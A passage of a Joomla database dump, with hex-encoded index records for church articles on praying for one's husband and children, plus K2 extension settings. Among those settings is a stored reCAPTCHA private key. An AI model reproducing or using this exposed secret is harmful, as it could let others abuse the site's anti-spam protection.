66169746820287363726970747572652062617365642070726179657273292063616e206d6f766520476f6420616e6420476f642077696c6c206d6f76652068696d202850726f2032313a3120e2809371756f746520706c73292e2053746f702079656c6c696e672061742068696d2c2074616c6b20746f20476f64e280a620616e6420476f642077696c6c2074616c6b20746f2068696d2e205768656e20476f642074616c6b7320746f20796f75722068757362616e642074686572652077696c6c2062652061206772656174657220726573756c742074686174207768656e20796f752074616c6b20746f2068696d3c2f703e0d0a3c703e42656c6f7720617265207072617965727320746f207072617920666f7220796f75722068757362616e642e3c2f703e0d0a3c703e312c2047656e20323a31362c2047656e20333a392c2047656e20343a362c47656e20363a31332c2047656e2031323a312d332c2031333a31342c2031353a312c2047656e2032363a20322d332c47656e2032383a31332d31362c2045786f20333a312d322c204a6f736820313a312c204163637420393a332d363c2f703e0d0a3c703e4c6f72642061707065617220746f2068696d2c204c6f726420656e636f756e7465722068696d2c204c6f72642074616c6b20746f2068696d2c204c6f7264206469726563742068696d2c204c6f7264206368616e67652068696d20617320796f752064696420666f72204164616d2c204e6f61682c204162726168616d2c2049736161632c204a61636f622c204d6f7365732c204a6f736875612c205061756c2e20476f64206973206e6f20726573706563746572206f6620706572736f6e732c2069662048652064696420697420696e20746865206269626c652c2048652077696c6c20646f20697420746f646179213c2f703e0d0a3c703e322c205073616c6d2036383a363c2f703e0d0a3c703e4c6f7264207365742068696d20756e646572206120476f642d6f726461696e65642066617468657220616d6f6e6720476f642d66656172696e6720667269656e64733c2f703e0d0a3c703e332c2047656e2031383a31382d31393c2f703e0d0a3c703e4c6f726420776f726b206f6e2068696d20746f2072657665616c20796f757273656c6620746f2068696d2d446f6ee2809974206869646520796f757220706c616e2066726f6d2068696d2e204f70656e206869732073706972697420746f20796f757220726576656c6174696f6e732c20646972656374696f6e7320616e6420737465702e3c2f703e0d0a3c703e342c205073616c6d203132313a352d383c2f703e0d0a3c703e446976696e652070726f74656374696f6e20617320686520676f657320757020616e6420646f776e2e3c2f703e0d0a3c703e352c20324368726f2031383a33312c205073616c6d2036383a33303c2f703e0d0a3c703e476f6420746f206d6f766520617761792068696d2064657374726f796572732c2073656475636572732c206465636569766572732c20636f6e667573696f6e69737473206574632e3c2f703e0d0a3c703e362050726179205073203132353a332d3c2f703e0d0a3c703ec2a020536174616ee280997320726f6420776f6ee28099742072657374206f6e2068696d20617420776f726b2c20617420686f6d652c20696e206368757263683c2f703e0d0a3c703e37205073616c6d203132383a312d363c2f703e0d0a3c703ec2a020c2a020c2a020c2a020c2a0202d2048652077696c6c2065617420746865206c61626f7572206f66206869732068616e64732c20647565207265776172647320666f722068617264206c61626f757220284973616961682036353a32312d3234292e2048652077696c6c2062652066756c66696c6c65642c2069742077696c6c2062652077656c6c20776974682068696d2e3c2f703e0d0a3c703ec2a020c2a020c2a020c2a020c2a0202d20596f752077696c6c206265206120667275697466756c2076696e6520666f722068696d2c20796f7572206368696c6472656e206173206f6c69766520706c616e74732067726f77696e672077656c6c20616e64206272696e67696e67206d756c7469706c6520626c657373696e677320746f2074686520686f6d652e3c2f703e0d0a3c703ec2a020c2a020c2a020c2a020c2a0202d205265636569766520666f722068696d2c2068697320706f7274696f6e206f7574206f66205a696f6e2e3c2f703e0d0a3c703ec2a020c2a020c2a020c2a020c2a0202d2048652077696c6c206561742074686520676f6f6420616e642070617274616b65206f6620746865206167656e6461206f6620476f6420696e2068697320646179733c2f703e0d0a3c703ec2a020c2a020c2a020c2a020c2a02d2048652077696c6c2073656520686973206368696c6472656ee2809973206368696c6472656e2e3c2f703e0d0a3c703e46696e616c6c792c20507261792074686520707261796572732074686174204162696761696c2070726179656420666f722044617669642e20283153616d2032353a32382d3330293c2f703e0d0a3c703e2d20476f6420746f206d616b652068696d2061207375726520686f7573653c2f703e0d0a3c703e2d20476f6420746f2066696768742068697320626174746c65733c2f703e0d0a3c703e2d20476f6420746f2062696e642068697320736f756c20696e207468652062756e646c65206f66206c6966652026616d703b20736c696e672074686174206f662068697320656e656d696573206f75742e3c2f703e0d0a3c703e2d20476f6420746f20646f20666f722068696d20616c6c2074686520676f6f642074686174204865206861732073706f6b656e20636f6e6365726e696e672068696d2e3c2f703e0d0a3c703e2d20476f6420746f206170706f696e742068696d20612072756c65722c206c65616465722c206b696e672e3c2f703e0d0a3c703e48652077696c6c20737572656c792072656d656d62657220796f7520617320686520737465707320756e746f2074686520706c6174666f726d206f6620676c6f727920476f64206861732064657369676e65642f6f726461696e656420666f722068696d2e20546865206d6f726520796f752070726179657220666f722068696d2074686520626574746572206865206265636f6d657320617320612068757362616e642c206661746865722c2068756d616e206265696e672e3c2f703e0d0a3c703e55736520796f757220776561706f6e206f6620696e74657263657373696f6e20616e64206f70657261746520696e206d61726974616c20766963746f7279213c2f703e0d0a3c703e536f7720796f7572207365656473206f6620696e74657263657373696f6e20616e642077616c6b20696e206861727665737473206f66207377656574206d61726974616c20636f6d666f7274213c2f703e0d0a3c703e596f752061726520626c65737365642e3c2f703e223b733a353a226361746964223b733a313a2236223b733a31303a22637265617465645f6279223b733a333a22323030223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d32332031363a32363a3034223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a226f72646572223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a2246616d696c79202620576f6d656e223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a393a2233343a707261796572223b733a373a22636174736c7567223b733a31343a22363a66616d696c792d776f6d656e223b733a363a22617574686f72223b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a32373a22636f6d706f6e656e742f6b322f6974656d2f33342d707261796572223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32353a2252657620284d727329204f79656e696b65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a2246616d696c79202620576f6d656e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a2246616d696c79202620576f6d656e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3334223b733a353a22726f757465223b733a34363a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33343a707261796572223b733a353a227469746c65223b733a33353a225363726970747572616c205072617965727320666f7220796f75722048757362616e64223b733a31313a226465736372697074696f6e223b733a3338343a2220544558543a205073616c6d203132383a312d656e642c20312053616d75656c2033302c2049736169616820363520496e74726f64756374696f6e3a2053746f7020636f6d706c61696e696e672061626f757420796f75722068757362616e642c2073746f70207175617272656c696e6720776974682068696d2c2073746f702067657474696e67206269747465722061742068696d2c2073746f7020636f6d706574696e6720616761696e73742068696d2c2073746f7020636f6d706172696e6720796f757273656c6620776974682068696d2c2073746f7020726174696e672068696d206f6e20686973207765616b6e65737320616e64206661696c7572652c2073746f7020636f6d706172696e672068696d2077697468206f746865727320746861742068617665207375636365737320746861742063616e206265207365656e2c2073746f7020616c6c206d616c6963652c206269636b6572696e6720616e642072616e636f75722c2053544f502c2053544f502c2053544f502120223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d32332031363a30363a3535223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d32332031363a30363a3535223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(174, 'index.php?option=com_k2&view=item&id=35', 'index.php?option=com_k2&view=item&id=35:seven-scriptural-prayers-for-victorious-children', 'Seven Scriptural Prayers for Victorious Children', ' Text : 1 Samuel 2:22; Genesis 13:7-14, Genesis 39:21; Psalms 46:7, 11; 91:1-16 There are 7 prayer points that I have found to be very important, that will help preserve your children if they are to become victorious in life regardless of whether they are', '2017-03-23 20:13:43', 'fe88e6ef20d50651425139ddccc1c79f', 1, 1, 1, '*', '2017-03-23 16:26:07', '0000-00-00 00:00:00', '2017-03-23 16:26:07', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223335223b733a353a22616c696173223b733a34383a22736576656e2d7363726970747572616c2d707261796572732d666f722d766963746f72696f75732d6368696c6472656e223b733a373a2273756d6d617279223b733a3238353a223c703e54657874203a20312053616d75656c20323a32323b2047656e657369732031333a372d31342c2047656e657369732033393a32313b205073616c6d732034363a372c2031313b2039313a312d31363c2f703e0d0a3c703e54686572652061726520372070726179657220706f696e747320746861742049206861766520666f756e6420746f206265207665727920696d706f7274616e742c20746861742077696c6c2068656c7020707265736572766520796f7572206368696c6472656e20696620746865792061726520746f206265636f6d6520766963746f72696f757320696e206c696665207265676172646c657373206f662077686574686572207468657920617265206f6c64206f7220796f756e672e3c2f703e0d0a223b733a343a22626f6479223b733a343431323a220d0a3c6f6c3e0d0a3c6c693e5072617920666f7220796f7572206368696c6472656e20746f206861766520612067726561742073706972697475616c206c6966652e204120736f756e6420616e642067726561742073706972697475616c206c6966652066726f6d207768656e20746865792061726520796f756e6720616e642067726f77696e672075702069732074686520677265617465737420696e6865726974616e636520796f752063616e206c6561766520666f7220796f7572206368696c6472656e2e20486f772066617220746865792063616e20676f20696e2074686520707572706f7365206f6620476f6420666f72207468656972206c